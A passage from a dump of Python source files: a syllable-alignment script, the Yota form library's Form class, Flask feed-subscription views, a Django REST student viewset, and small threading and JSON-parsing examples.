= []\n for ch in word:\n virt_phonemes.append(mp_dict[ch][0])\n # print(virt_phonemes)\n dtw_path = dtw.get_DTW_path(phoneme_list, virt_phonemes)\n # print(dtw_path)\n\n res_indices = []\n word_length = len(word)\n prev_len = 0\n for i in range(len(syllable_list)):\n virt_ind = prev_len\n phoneme_ind = find_element_in_list(virt_ind, dtw_path[1])[0]\n syllable_ind = dtw_path[0][phoneme_ind]\n res_indices.append(syllable_ind)\n prev_len += len(syllable_list[i])\n res_phonemes = []\n for i, ind in enumerate(res_indices):\n if i == len(res_indices) - 1:\n res_phonemes.append([x for x in phoneme_list[ind:]])\n else:\n res_phonemes.append([x for x in phoneme_list[ind:res_indices[i+1]]])\n \"\"\"\n for syl in res_phonemes:\n print(' '.join([x for x in syl]), end=' - ')\n \"\"\"\n return res_indices, res_phonemes, syllables\n\n\ndef syllable_recognize(file_path, word):\n res_file = 'test_syllable_shan.txt'\n with open(res_file, 'at') as fp:\n fp.write('file name: {}\\n'.format(os.path.basename(file_path)))\n\n # \"\"\"\n align_result = util.get_mfa_aligning(file_path, word)\n syll_indices, syll_list, sylls = get_mapping_syllable(word)\n time_frames = []\n if len(align_result) > 0:\n fp.write('syllable: {}\\n'.format(sylls))\n for i, syll_ind in enumerate(syll_indices):\n if i < len(syll_indices) - 1:\n syl_rep = ' '.join([x for x in syll_list[i]])\n st_time = align_result[syll_ind][0]\n ed_time = align_result[syll_indices[i+1]-1][1]\n else:\n syl_rep = ' '.join([x for x in syll_list[-1]])\n st_time = align_result[syll_ind][0]\n ed_time = align_result[-1][1]\n time_frames.append([syl_rep, st_time, ed_time])\n fp.write('{}: [{}, {}]\\n'.format(syl_rep, st_time, ed_time))\n else:\n _, comp_align_result = get_audio_transcribe(_decoder, file_path)\n for seg in comp_align_result:\n align_result.append([seg[1], seg[2], seg[0]])\n\n fp.write('\\n')\n\n _, align_result2 = get_audio_transcribe(_decoder, file_path)\n print(align_result2)\n a = 0\n \"\"\"\n fp.write('phoneme aligning:\\n')\n for seg in align_result1:\n fp.write('\\t{}: [{:.2f}, {:.2f}]\\n'.format(seg[0], seg[1], seg[2]))\n fp.write('\\n')\n for seg in align_result2:\n fp.write('\\t{}: [{:.2f}, {:.2f}]\\n'.format(seg[0], seg[1], seg[2]))\n \n syllables = get_syllables(word)\n fp.write('syllable: {}\\n'.format(syllables))\n\n all_phonemes = get_whole_phoneme(word)\n for ind in range(len(all_phonemes)):\n fp.write('phoneme-{}: {}\\n'.format(ind + 1, ' '.join(x for x in all_phonemes[ind])))\n fp.write('\\n')\n # \"\"\"\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Running Aligner Inference\")\n parser.add_argument('--dir', default=None, help='Path to data directory which includes sample files')\n args = parser.parse_args()\n\n work_folder = args.dir\n if work_folder is not None:\n if not os.path.exists(work_folder):\n print(\"data path error!\")\n sys.exit(1)\n\n conv_folder = os.path.join(work_folder, 'conv_data')\n if not os.path.exists(conv_folder):\n os.mkdir(conv_folder)\n util.convert2wav_folder(work_folder, conv_folder)\n\n for f in os.listdir(conv_folder):\n print('\\nprocessing with {}'.format(f))\n file_path = os.path.join(conv_folder, f)\n # file name: speaker_word_revision\n word = f.split('-')[1].lower()\n syllable_recognize(file_path, word)\n # get_mapping_syllable(word)\n else:\n print(\"argument error\")\n 
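# Editorial comment (not part of the original source): exiting non-zero here lets shell callers detect the missing or invalid --dir invocation.\n 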
sys.exit(1)\n","sub_path":"scoringAPI/scoring_engine/syllableRecognize.py","file_name":"syllableRecognize.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"358386720","text":"from yota.renderers import JinjaRenderer\nfrom yota.processors import FlaskPostProcessor\nfrom yota.nodes import LeaderNode, Node\nfrom yota.validators import Check, Listener\nimport json\nimport copy\n\n\nclass TrackingMeta(type):\n \"\"\" This metaclass builds our Form classes. It generates the internal\n _node_list which preserves order of Nodes in your Form as declared. It also\n generates _validation_list for explicitly declared Check attributes in the\n Form \"\"\"\n\n def __init__(mcs, name, bases, dct):\n \"\"\" Process all of the attributes in the `Form` (or subclass)\n declaration and place them accordingly. This builds the internal\n _node_list and _validation_list and is responsible for preserving\n initial Node order. \"\"\"\n\n nodes = {}\n mcs._validation_list = []\n mcs._node_list = []\n mcs._event_lists = {}\n for name, attribute in dct.items():\n # These aren't ordered Nodes, ignore them\n if name == 'start' or name == 'close':\n try:\n attribute._attr_name = name\n except AttributeError:\n raise AttributeError(\"start/close attribute is special and \"\n \"should specify a Node to begin your form. Got type {0} \"\n \"instead\".format(type(name)))\n continue\n if isinstance(attribute, Node):\n attribute._attr_name = name\n nodes[attribute._create_counter] = attribute\n delattr(mcs, name)\n elif isinstance(attribute, Check):\n # if we've found a validation check\n attribute._attr_name = name\n mcs._validation_list.append(attribute)\n delattr(mcs, name)\n elif isinstance(attribute, Listener):\n # if we've found an event listener\n attribute._attr_name = name\n if attribute.type not in mcs._event_lists:\n mcs._event_lists[attribute.type] = []\n mcs._event_lists[attribute.type].append(attribute)\n delattr(mcs, name)\n else:\n # just assume that this is some kind of blueprint with\n # ducktyping\n try:\n for node in attribute._node_list:\n nodes[node._create_counter] = node\n except AttributeError:\n pass\n\n # merge in our events\n try:\n for key, lst in attribute._event_lists.items():\n if key in mcs._event_lists:\n mcs._event_lists[key].extend(lst)\n else:\n mcs._event_lists[key] = lst\n except AttributeError:\n pass\n\n # and validation\n try:\n mcs._validation_list.extend(attribute._validation_list)\n except AttributeError:\n pass\n\n # insert our nodes in sorted order by their initialization order, thus\n # preserving order\n for i, attribute in sorted(nodes.items()):\n mcs._node_list.append(attribute)\n\n_Form = TrackingMeta('_Form', (object, ), {})\nclass Form(_Form):\n \"\"\" This is the base class that all user defined forms should inherit from,\n and as such it is the main way to access functionality in Yota. It\n provides the core functionality involved with setting up and\n rendering the form.\n\n :param context: This is a context specifically for the special form open\n and form close nodes, canonically called start and close.\n\n :param g_context: This is a global context that will be passed to all nodes\n in rendering through their rendering context as 'g' variable.\n\n :param start_template: The template used when automatically\n injecting a start Node. 
See :attr:`yota.Form.auto_start_close` for\n more information.\n\n :param close_template: The template used when automatically\n injecting a close Node. See :attr:`yota.Form.auto_start_close` for\n more information.\n\n :param auto_start_close: Dictates whether or not start and close\n Nodes will be automatically appended/prepended to your form. Note\n that this must be set via __init__ or your class definition since it\n must be set before __init__ for the Form is run.\n\n :param hidden: A dictionary of hidden key/value pairs to be injected\n into the form. This is frequently used to pass dynamic form\n parameters into the validator.\n\n \"\"\"\n\n __metaclass__ = TrackingMeta\n _renderer = JinjaRenderer\n \"\"\" This is a class object that is used to perform the actual rendering\n steps, allowing different rendering engines to be swapped out. More about\n this in the section :class:`Renderer` \"\"\"\n _processor = FlaskPostProcessor\n \"\"\" This is a class that performs post processing on whatever is passed in\n as data during validation. The intended purpose of this was to write\n processors that translated submitted form data from the format of the web\n framework being used to a format that Yota expects. It also allows things\n like filtering stripping characters or encoding all data that enters a\n validator. \"\"\"\n _reserved_attr_names = ('context', 'hidden', 'g_context', 'start_template',\n 'close_template', 'auto_start_close', '_renderer',\n '_processor', 'name')\n name = None\n context = {}\n g_context = {}\n title = None\n auto_start_close = True\n start_template = 'form_open'\n close_template = 'form_close'\n render_success = False\n render_error = False\n type_class_map = {'error': 'alert alert-error',\n 'info': 'alert alert-info',\n 'success': 'alert alert-success',\n 'warn': 'alert alert-warn'}\n \"\"\" A mapping of error types to their respective class values. Used to\n render messages to the user from validation. Changing it to render messages\n differently could be performed as follows:\n\n .. 
code-block:: python\n\n class MyForm(yota.Form):\n first = EntryNode(title='First name', validators=Check(MinLengthValidator(5)))\n last = EntryNode(title='Last name', validators=MinLengthValidator(5)\n\n # Override the default type_class_map with our own\n type_class_map = {'error': 'alert alert-error my-special-class', # Add an additional class\n 'info': 'alert alert-info',\n 'success': 'alert alert-success',\n 'warn': 'alert alert-warn'}\n \"\"\"\n\n\n def __init__(self, **kwargs):\n # A bit of a hack to copy all our class attributes\n for class_attr in dir(self):\n if class_attr in kwargs:\n continue\n att = getattr(self, class_attr)\n # We want to copy all the nodes as well as the list, this is a\n # succinct way to do it\n if class_attr in ['_node_list', '_validation_list', '_event_lists']:\n setattr(self, class_attr, copy.deepcopy(att))\n # Private attributes are internal stuff..\n elif not class_attr.startswith('__'):\n # don't try to copy functions, it doesn't go well\n if not callable(att):\n setattr(self, class_attr, copy.copy(att))\n self.context[class_attr] = att\n\n # Set a default name for our Form\n if self.name is None:\n self.name = self.__class__.__name__\n\n # pass some attributes to start/close nodes\n self.context['name'] = self.name\n self.context['title'] = self.title\n\n # run our safety checks, set identifiers, and set local attributes\n for node in self._node_list:\n self._setup_node(node)\n\n # passes everything to our rendering context and updates params.\n self.context.update(kwargs)\n self.__dict__.update(kwargs)\n\n # Add our open and close form defaults\n if hasattr(self, 'start'):\n self._node_list.insert(0, self.start)\n else:\n if self.auto_start_close:\n self.insert(0, LeaderNode(template=self.start_template,\n _attr_name='start',\n **self.context))\n if hasattr(self, 'close'):\n self._node_list.append(self.close)\n else:\n if self.auto_start_close:\n self.insert(-1, LeaderNode(template=self.close_template,\n _attr_name='close',\n **self.context))\n\n # Add some useful global variables for templates\n default_globals = {'form_id': self.name}\n # Let our globals be overridden\n default_globals.update(self.g_context)\n self.g_context = default_globals\n\n # Initialize some general state variable\n self._last_valid = None\n self._last_raw_json = None\n\n def render(self):\n \"\"\" Runs the renderer to parse templates of nodes and generate the form\n HTML.\n\n :returns: A string containing the generated output.\n \"\"\"\n # process the errors before we render\n self._process_errors()\n\n return self._renderer().render(self._node_list, self.g_context)\n\n def add_listener(self, listener, type):\n \"\"\" Attaches a :class:`Listener` to an event type. These Listener will\n be executed when trigger event is called. \"\"\"\n if type not in self._event_lists:\n self._event_lists[type] = []\n self._event_lists[type].append(listener)\n\n def trigger_event(self, type):\n \"\"\" Runs all the associated :class:`Listener`'s for a specific event\n type. \"\"\"\n try:\n for event in self._event_lists[type]:\n event.resolve_attr_names(self)\n event()\n except KeyError:\n pass\n\n def _setup_node(self, node):\n \"\"\" An internal function performs some safety checks, sets attribute,\n and set_identifiers \"\"\"\n try:\n if type(node._attr_name) is not str:\n raise AttributeError\n except AttributeError as e:\n raise AttributeError('Dynamically inserted nodes must have a _attr_name'\n ' attribute as a string. Please add it. 
')\n\n if hasattr(self, node._attr_name):\n raise AttributeError('Attribute name {0} overlaps with a Form '\n 'attribute. Please rename.'\n .format(node._attr_name))\n\n node.set_identifiers(self.name)\n setattr(self, node._attr_name, node)\n\n def _parse_shorthand_validator(self, node):\n \"\"\" Loops through all the Nodes and checks for shorthand validators.\n After inserting their checks into the form obj they are removed from\n the node. This is because a validation may be called multiple times on\n a single form instance. \"\"\"\n if hasattr(node, 'validators') and node.validators:\n # Convert a single callable to an iterator for convenience\n if callable(node.validators):\n node.validators = (node.validators, )\n\n for validator in node.validators:\n # If they provided a check add it, otherwise make the check\n # for them\n if isinstance(validator, Check):\n # Just for extra flexibility, add the attr if they left it out\n if not validator.args and not validator.kwargs:\n validator.args.append(node._attr_name)\n self._validation_list.append(validator)\n else:\n # Assume only a single attr if not specified\n new_valid = Check(validator, node._attr_name)\n self._validation_list.append(new_valid)\n\n # remove the attribute so multiple calls don't break things\n delattr(node, 'validators')\n\n def _process_errors(self):\n for node in self._node_list:\n # process the node errors and inject special values\n for error in node.errors:\n # Try and retrieve the class values for the result type\n # and send along the required render value\n try:\n error['_type_class'] = self.type_class_map[error['type']]\n except KeyError:\n error['_type_class'] = self.type_class_map['error']\n\n def insert_validator(self, new_validators):\n \"\"\" Inserts a validator into the validator list.\n\n :param validator: The :class:`Check` to be inserted.\n :type validator: Check \"\"\"\n\n for validator in new_validators:\n # check to allow passing in just a check\n if not isinstance(validator, Check):\n raise TypeError('Can only insert type Check or derived classes')\n\n # append the validator to the list\n self._validation_list.append(validator)\n\n def insert(self, position, new_node_list):\n \"\"\" Inserts a :class:`Node` object or a list of objects at the\n specified position into the :attr:`Form._node_list` of the form.\n Index -1 is an alias for the end of the list. After insertion\n the :meth:`Node.set_identifiers` will be called to generate\n identification for the :class:`Node`. For this to function,\n :attr:`Form._attr_name` must be specified for the node prior to\n insertion. \"\"\"\n\n # check to allow passing in just a node\n if isinstance(new_node_list, Node):\n new_node_list = (new_node_list,)\n\n for i, new_node in enumerate(new_node_list):\n\n self._setup_node(new_node)\n\n if position == -1:\n self._node_list.append(new_node)\n else:\n self._node_list.insert(position + i, new_node)\n\n def insert_after(self, prev_attr_name, new_node_list):\n \"\"\" Runs through the internal node structure attempting to find\n a :class:`Node` object whose :attr:`Node._attr_name` is\n prev_attr_name and inserts the passed node after it. If\n `prev_attr_name` cannot be matched it will be inserted at the\n end. 
Internally calls :meth:`Form.insert` and has the same\n requirements of the :class:`Node`.\n\n :param prev_attr_name: The attribute name of the `Node` that you\n would like to insert after.\n :type prev_attr_name: string\n :param new_node_list: The :class:`Node` or list of Nodes to be\n inserted.\n :type new_node_list: Node or list of Nodes \"\"\"\n\n # check to allow passing in just a node\n if isinstance(new_node_list, Node):\n new_node_list = (new_node_list,)\n\n # Loop through our list of nodes to find where to insert\n for index, node in enumerate(self._node_list):\n # found!\n if node._attr_name == prev_attr_name:\n for i, new_node in enumerate(new_node_list):\n self._node_list.insert(index + i + 1, new_node)\n setattr(self, new_node._attr_name, new_node)\n new_node.set_identifiers(self.name)\n break\n else:\n # failover append if not found\n for new_node in new_node_list:\n self._node_list.append(new_node)\n\n def get_by_attr(self, name):\n \"\"\" Safe accessor for looking up a node by :attr:`Node._attr_name` \"\"\"\n try:\n attr = getattr(self, name)\n except AttributeError:\n pass\n else:\n if isinstance(attr, Node):\n return attr\n raise AttributeError('Form attribute {0} couldn\\'t be resolved to'\n ' a Node'.format(name))\n\n def success_header_generate(self):\n \"\"\" Please see the documentation for :meth:`Form.error_header_generate`\n as it covers this function as well as itself. \"\"\"\n pass\n\n def error_header_generate(self, errors, block):\n \"\"\" This function, along with success_header_generate allow you to give\n form wide information back to the user for both AJAJ validated forms\n and conventionally validated forms, although the mechanisms are\n slightly different. Both functions are run at the end of a successful\n or failed validation call in order to give more information for\n rendering.\n\n For passing information to AJAJ rendering, simply return a dictionary,\n or any Python object that can be serialized to JSON. This information\n gets passed back to the JavaScript callbacks of yota_activate, however\n each in slightly different ways. success_header_generate's information\n will get passed to the render_success callback, while\n error_header_generate will get sent as an error to the render_error\n callback under the context start.\n\n For passing information into a regular, non AJAJ context simply access\n the attribute manually similar to below.\n\n .. code-block:: python\n\n self.start.add_error(\n {'message': 'Please resolve the errors below to continue.'})\n\n This will provide a simple error message to your start Node. In\n practice these functions could also be used to trigger events and other\n interesting things, although that was not their intended function.\n\n :param errors: This will be a list of all other Nodes that have errors.\n :param block: Whether or not the form submission will be blocked.\n :type block: boolean\n\n .. note: By default this function does nothing.\n \"\"\"\n pass\n\n def data_by_attr(self):\n \"\"\" Returns a dictionary of currently stored :attr:`Node.data`\n attributes keyed by :attr:`Node._attr_name`. Used for returning data\n after its been processed by validators. \"\"\"\n\n ret = {}\n for node in self._node_list:\n ret[node._attr_name] = node.data\n return ret\n\n def data_by_name(self):\n \"\"\" Returns a dictionary of currently stored :attr:`Node.data`\n attributes keyed by :attr:`Node.name`. Used for returning data\n after its been processed by validators. 
\"\"\"\n\n ret = {}\n for node in self._node_list:\n ret[node.name] = node.data\n return ret\n\n def _gen_validate(self, data, piecewise=False):\n \"\"\" This is an internal utility function that does the grunt work of\n running validation logic for a :class:`Form`. It is called by the other\n primary validation methods. \"\"\"\n\n # Allows user to set a modular processor on incoming data\n data = self._processor().filter_post(data)\n\n\n # reset all error lists and data\n for node in self._node_list:\n node.errors = []\n node.data = ''\n node.resolve_data(data)\n # Pull out all our shorthand validators\n self._parse_shorthand_validator(node)\n\n # try to load our visited list of it's piecewise validation\n if '_visited_names' not in data and piecewise:\n raise AttributeError(\"No _visited_names present in data submission\"\n \". Data is required for piecewise validation\")\n elif piecewise:\n visited = json.loads(data['_visited_names'])\n\n # assume to be not blocking\n block = False\n # loop over our checks and run our validators\n for check in self._validation_list:\n check.resolve_attr_names(self)\n if piecewise is False or check.node_visited(visited):\n check()\n else:\n # If even a single check can't be run, we need to block\n block = True\n\n # Run the one off validation method\n self.validator()\n\n # a list to hold Nodes that actually have errors\n error_node_list = []\n for node in self._node_list:\n # slightly confusing way of setting our block = True by\n # default\n if node.errors:\n\n error_node_list.append(node)\n\n for error in node.errors:\n block |= error.get('block', True)\n\n return block, error_node_list\n\n def json_validate(self, data, piecewise=False, raw=False):\n \"\"\" The same as :meth:`Form.validate_render` except the errors\n are loaded into a JSON string to be passed back as a query\n result. This output is designed to be used by the Yota\n Javascript library.\n\n :param piecewise: If set to True, the validator will silently\n ignore validator for which it has insufficient information. This\n is designed to be used for the AJAJ piecewise validation\n function, although it does not have to be.\n :type piecewise: boolean\n\n :param raw: If set to True then the second return parameter will be a\n Python dictionary instead of a JSON string\n :type raw: boolean\n\n :return: A boolean whether or not the form submission is valid and the\n json string (or raw dictionary) to pass back to the javascript side.\n The boolean is an anding of submission (whether the submit button was\n actually pressed) and the block parameter (whether or not any blocking\n validators passed)\n \"\"\"\n\n # Allows user to set a modular processor on incoming data\n data = self._processor().filter_post(data)\n\n errors = {}\n \"\"\" We want to automatically block the form from actually submitting\n if this is piecewise validation. 
In addition if they are actually\n submitting then we want to run it as non-piecewise validation \"\"\"\n if data.get('submit_action', 'false') != 'true' and piecewise:\n block, invalid = self._gen_validate(data, piecewise=piecewise)\n block = True\n else:\n block, invalid = self._gen_validate(data, piecewise=False)\n\n # loop over our nodes and insert information for the JS callbacks\n for node in invalid:\n errors[node._attr_name] = {'identifiers': node.json_identifiers(),\n 'errors': node.errors}\n\n # if needed we should run our all form message generator and return\n # json encoded error message\n retval = {'block': block}\n if len(errors) > 0:\n header_err = self.error_header_generate(errors, block)\n if header_err:\n errors['start'] = {'identifiers': self.start.json_identifiers(),\n 'errors': header_err}\n\n if not block:\n blob = self.success_header_generate()\n if blob:\n retval['success_blob'] = blob\n if hasattr(self, 'start'):\n retval['success_ids'] = self.start.json_identifiers()\n\n retval['errors'] = errors\n\n # Throw back a variable in the json if there is both a submit\n # and no blocking errors. The main purpose here is to allow\n # easy catching of success in the view code.\n if data.get('submit_action', 'false') == 'true' and not block:\n valid = True\n self.trigger_event(\"validate_success\")\n else:\n self.trigger_event(\"validate_failure\")\n valid = False\n\n # Hold our return dictionary in memory for easy editing later\n self._last_raw_json = retval\n\n # process the errors before we serialize\n self._process_errors()\n\n # Return our raw dictionary if requested, otherwise serialize for\n # convenience...\n if raw:\n return valid, retval\n else:\n return valid, json.dumps(retval)\n\n def validate(self, data):\n \"\"\" Runs all the validators associated with the :class:`Form`.\n\n :return: Whether the validators are blocking submission and a list of\n nodes that have validation messages.\n \"\"\"\n\n # Allows user to set a modular processor on incoming data\n data = self._processor().filter_post(data)\n block, invalid = self._gen_validate(data)\n\n # Run our validation trigger events\n if block:\n self.trigger_event(\"validate_failure\")\n else:\n self.trigger_event(\"validate_success\")\n\n return (not block), invalid\n\n def validate_render(self, data):\n \"\"\" Runs all the validators on the `data` that is passed in and returns\n a re-render of the :class:`Form` if there are validation errors,\n otherwise it returns True representing a successful submission. Since\n validators are designed to pass error information in through the\n :attr:`Node.errors` attribute then this error information is in turn\n available through the rendering context.\n\n :param data: The data to be passed through the\n `Form._processor`. 
If the data is in the form of a dictionary\n where the key is the 'name' of the form field and the data is a\n string then no post-processing is necessary.\n :type data: dictionary\n\n :return: Whether the validators are blocking submission and a re-render\n of the form with the validation data passed in.\n \"\"\"\n\n # Allows user to set a modular processor on incoming data\n data = self._processor().filter_post(data)\n\n block, invalid = self._gen_validate(data)\n\n self.g_context['block'] = block\n\n # update our state var for later update_success calls\n self._last_valid = 'render'\n\n # run our form validators at the end\n if not block:\n self.trigger_event(\"validate_success\")\n self.success_header_generate()\n else:\n self.trigger_event(\"validate_failure\")\n self.error_header_generate(invalid, block)\n\n return (not block), self.render()\n\n def validator(self):\n \"\"\" This is provided as a convenience method for Validation logic that\n is one-off, and only intended for a single form. Simply override this\n function and access any of your Nodes and their data via self. This\n method will be called after all other Validators are run. \"\"\"\n pass\n\n def update_success(self, update_dict, raw=False):\n \"\"\" This method serves as an easy way to update your success attributes\n that are passed to the start Node rendering context, or passed back in\n JSON. It automatically recalls whether the last validation call was to\n json_validate or validate_render and modifies the correct dictionary\n accordingly.\n\n :param update_dict: The dictionary of values to update/add.\n :type data: dictionary\n\n :param raw: Whether you would like a pre-compiled JSON\n string returned, or the raw dictionary.\n :type raw: bool\n\n :return: Return value is either the new JSON string (or raw dict if\n requested) if json_validate was your last validation call, or a\n re-render of the form with updated error messages if validate_render\n was your last call.\n \"\"\"\n\n if self._last_valid == 'render':\n try:\n self.start.errors[-1].update(update_dict)\n except IndexError:\n raise IndexError(\"Error updating your error dictionary for the \"\n \"start Node. 
There were no errors to modify.\")\n except AttributeError:\n raise AttributeError(\"This method is designed to update an \"\n \"error dictionary, yet your errors are \"\n \"not dictionaries\")\n\n return self.render()\n\n # We're going to default to json render\n else:\n # Modify our last json dict\n try:\n self._last_raw_json['success_blob'].update(update_dict)\n except KeyError:\n raise KeyError(\"Either your json_validate method has not been \"\n \"run yet, or your success_header_generate does\"\n \" not produce output\")\n\n # Continue the raw semantic...\n if raw:\n return self._last_raw_json\n else:\n return json.dumps(self._last_raw_json)\n\n","sub_path":"src/yota/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":28716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"428369649","text":"import re\nimport time\nfrom typing import List, Dict\n\nfrom celery import group\nfrom flask import render_template, request, current_app as app, jsonify, flash\nfrom flask_security import current_user, login_required\n\nfrom feedrsub.feeds import feeds_blueprint as bp\nfrom feedrsub.feeds.feedfactory import FeedFactory\nfrom feedrsub.feeds.session_manager import FeedSessionManager\nfrom feedrsub.feeds.tasks import task_search_feed\nfrom feedrsub.ingestion import subscriber\nfrom feedrsub.utils.flash import ALERT\n\ncomment_pattern = '\\/comment(?:s)?(?:\\/)?'\ncomment_regex = re.compile(comment_pattern)\n\nexcluded_domains = ['auctorial.com']\n\n\n@bp.route('/subscribe', methods=['GET'])\n@login_required\ndef subscribe_feeds():\n flash('Search for RSS, Atom, or JSON feeds using the Search Box below. Enter the URL of the Website where ' +\n 'the Writers you\\'d like to follow are published, then click the \"Search for Feeds\" button. If we find any Feeds, ' +\n 'they will be displayed below the Search Box. Click the \"Subscribe\" button for the relevant Feed, and we will ' +\n 'automatically start following them. 
If the Writers you are following have Articles in the Feed, you will ' +\n 'start being notified when new Articles appear.', ALERT.INFO)\n return render_template('subscribe.html')\n\n\n@bp.route('/findfeeds', methods=['GET', 'POST'])\ndef search_feeds():\n \"\"\"\n Search for feeds for a given list of urls\n \"\"\"\n\n if request.method == 'POST':\n urls = request.form.getlist('urls[]')\n else:\n urls = request.args.getlist('url')\n\n # Accept a max of 3 unique URLs\n urls = set(urls[:3])\n\n app.logger.info('Searching for Feeds at Urls: %s', urls)\n\n start_time = time.perf_counter()\n\n # Create a Celery Task for each URL\n tasks = []\n for url in urls:\n tasks.append(task_search_feed.s(url))\n\n job = group(tasks)\n result = job.apply_async()\n\n # Get Results of Tasks\n result_list = result.get()\n\n json_feeds: List[Dict] = []\n not_found: List[str] = []\n excluded: List[str] = []\n\n for result in result_list:\n # Unpack result Tuple[List[Dict], List[str], List[str]] without\n # rebinding the accumulator lists themselves\n feeds, result_not_found, result_excluded = result\n json_feeds.extend(feeds)\n not_found.extend(result_not_found)\n excluded.extend(result_excluded)\n\n # Save FeedInfo to Session\n FeedSessionManager.save_feed_info(json_feeds)\n\n search_time = (time.perf_counter() - start_time)\n search_time_in_ms = int(search_time * 1000)\n\n app.logger.info('Returning found Feeds: %s', json_feeds)\n return jsonify({\"feeds\": json_feeds,\n \"not_found\": not_found,\n \"excluded\": excluded,\n \"search_time\": search_time_in_ms})\n\n\n@bp.route('/sendsubscribe', methods=['POST'])\n@login_required\ndef send_subscribe_feed():\n \"\"\"\n Subscribes to a single feed.\n \"\"\"\n\n requested_url = request.get_json()\n app.logger.info('%s requested Subscription to URL: %s', current_user, requested_url)\n\n # Only subscribe if feed was found by search_feed method and\n # loaded in session, otherwise return empty result.\n if requested_url not in FeedSessionManager.load_feed_urls():\n app.logger.warning('Requested URL: %s was not found in session', requested_url)\n return jsonify({'subscribed': None})\n\n feed_info = FeedSessionManager.get_requested_feed_info(requested_url)\n\n if not feed_info:\n app.logger.warning('Requested StatusFeedInfo for URL: %s was not found in session', requested_url)\n return jsonify({'subscribed': None})\n\n feed = FeedFactory.create_or_activate_feed(feedinfo=feed_info,\n user=current_user)\n\n if feed.is_push:\n try:\n app.logger.info('Sending subscription request for %s to %s', feed, feed.hub)\n subscriber.subscribe(feed.topic)\n except Exception as e:\n app.logger.warning('Failed to subscribe to %s: %s', feed, e)\n\n return jsonify({'subscribed': feed_info.url})\n","sub_path":"feedrsub/feeds/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"295895217","text":"import requests\nfrom django.shortcuts import render\n# Create your views here.\nfrom rest_framework import viewsets, filters, permissions\nfrom rest_framework.decorators import action\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.reverse import reverse\n\nfrom .models import Student\nfrom .serializers import StudentSerializer\n\nclass PermissionsPerMethodMixin(object):\n def get_permissions(self):\n \"\"\"\n Allows overriding default permissions with @permission_classes\n \"\"\"\n view = 
getattr(self, self.action)\n if hasattr(view, 'permission_classes'):\n return [permission_class() for permission_class in view.permission_classes]\n return super().get_permissions()\n\nclass StudentPagination(PageNumberPagination):\n page_size = 25\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Student.objects.all()\n serializer_class = StudentSerializer\n permission_classes = [IsAuthenticated,]\n pagination_class = StudentPagination\n filter_backends = (filters.SearchFilter,)\n search_fields = ('roll_no', 'name')\n\n def get_queryset(self):\n return self.queryset\n\n @action(detail=False, methods=['get'])\n def activate(self, request,*args, **kwargs):\n protocol = 'https://' if request.is_secure() else 'http://'\n web_url = protocol + request.get_host()\n post_url = \"http://127.0.0.1:8100/djoser_auth/users/activation/\"\n uid = request.query_params.get('uid')\n token = request.query_params.get('token')\n print(\"UID AND TOKEN\", uid, token)\n post_data = {'uid': uid, 'token': token}\n result = requests.post(post_url, post_data)\n content = result.text\n print(\"COOO\", content)\n return Response(content)\n\n @action(detail=False, methods=['get'])\n def get_student(self, request, *args, **kwargs):\n id = request.query_params.get('id')\n student = self.queryset.get(id=id)\n serializer = StudentSerializer(student, context={'request': request})\n return Response(serializer.data)\n\n @action(detail=False, methods=['get'])\n def student_info(self, request, *args, **kwargs):\n student = self.queryset.get(username = request.user)\n serializer = StudentSerializer(student, context={'request':request})\n return Response(serializer.data)\n\n @action(detail=False, methods=['post'])\n def update_info(self, request, *args, **kwargs):\n data = request.data\n Student.objects.filter(username=request.user).update(**request.data)\n student = self.queryset.get(username=request.user)\n serializer = StudentSerializer(student, context={'request': request})\n return Response(serializer.data)\n\n","sub_path":"tnp/student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"586440562","text":"__author__ = 'Avantha'\nimport threading\n\nclass AvanthaMessages(threading.Thread):\n def run(self):\n for _ in range(10):# thius ignores a variable but loop for 10 times\n print(threading.current_thread().getName())\n\nx = AvanthaMessages(name='Send out messages')\ny = AvanthaMessages(name='Receive messages')\nx.start()\ny.start()\n\n","sub_path":"Threading.py","file_name":"Threading.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"309663922","text":"import json\nfrom pprint import pprint\n\nwith open('data/manifestsample.json') as data_file:\n data = json.load(data_file)\n\n\n#pprint(data)\n\n\n#print(len(data))\n\"\"\"\nData is only 1 object in a list. Why?\nIs this being manually generated? If so, why? 
While this is valid, it is not logical.\n\"\"\"\n\ndata = data[0] # Pull the first item out.\n\nfor item in data:\n #pprint(item)\n\n \"\"\"\n Keys\n ['Generator', 'InternationalShipmentInfo', 'TSDF',\n 'EmergencyResponsePhone', 'DesignatedFacilityInfo',\n 'ManifestTrackingNumber', 'Transporter', 'ManifestedWaste',\n 'AdditionalInfo_Line14']\n \"\"\"\n\n for value in data[item]:\n #pprint(type(value))\n \"\"\" Values are strings or dicts \"\"\"\n\n print(item, value)\n\n\n\n","sub_path":"parse_json.py","file_name":"parse_json.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"578036179","text":"from collections import defaultdict\nfrom timeit import default_timer as timer\nfrom types import SimpleNamespace\n\nimport pandas as pd\nfrom numpy import nan\n\nfrom cascade.core import getLoggers\nfrom cascade.core.db import db_queries, age_spans\nfrom cascade.executor.covariate_data import assign_epiviz_covariate_names\nfrom cascade.executor.covariate_data import find_covariate_names, add_covariate_data_to_observations_and_avgints\nfrom cascade.executor.session_options import make_options, make_minimum_meas_cv\nfrom cascade.input_data.configuration.construct_bundle import (\n normalized_bundle_from_database,\n normalized_bundle_from_disk,\n bundle_to_observations,\n strip_bundle_exclusions,\n dataframe_from_disk)\nfrom cascade.input_data.configuration.construct_country import check_binary_covariates\nfrom cascade.input_data.configuration.construct_country import 